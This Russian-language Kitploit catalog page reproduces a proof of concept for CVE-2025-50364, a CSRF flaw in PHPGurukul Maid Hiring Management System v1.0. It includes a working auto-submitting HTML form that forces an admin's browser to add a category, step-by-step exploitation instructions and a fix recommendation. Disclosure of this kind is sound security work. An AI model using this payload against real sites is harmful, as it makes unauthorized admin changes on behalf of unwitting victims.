Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE — Доказательство концепции уязвимости CSRF в PHPGurukul Maid Hiring Management System v1.0, демонстрирующее неавторизованное создание категорий с помощью поддельных вредоносных запросов. | Kitploit
Инструменты/GitHubGitHub/1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHub1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve

CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE

Доказательство концепции уязвимости CSRF в PHPGurukul Maid Hiring Management System v1.0, демонстрирующее неавторизованное создание категорий с помощью поддельных вредоносных запросов.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 год назадЕщё не проверено

Имя проекта и URL репозитория: Maid Hiring Management System using PHP and MySQL

Тип уязвимости: Подделка запроса на стороне клиента (CSRF)

Затронутая версия: v1.0

💣Описание уязвимости: В панели администратора PHPGurukul Hiring Management System существует уязвимость межсайтовой подделки запроса (CSRF), позволяющая злоумышленнику добавлять произвольные категории найма, обманом заставляя аутентифицированного администратора перейти на вредоносный сайт. Это может привести к загрязнению данных и несанкционированным изменениям на уровне администратора.

👩‍💻Воздействие: Несанкционированное создание категорий

🛜Доказательство концепции (PoC)

  1. Существовала функция добавления категории, доступная только аутентифицированному администратору. 1
  2. HTML-код для отправки POST-запроса к конечной точке /admin/add-category.php CSRF-POC 2
root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
      <input type="hidden" name="catname" value="CSRF&#45;POC" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. Используйте HTML-код и создайте вредоносный URL. 3
  2. После того как администратор переходит по ссылке, будет добавлена новая категория. 4 5

Рекомендация: Реализовать CSRF-токены в формах администратора, принудительно использовать SameSite-куки и проверять источник запроса для предотвращения несанкционированных действий.

Скачать инструмент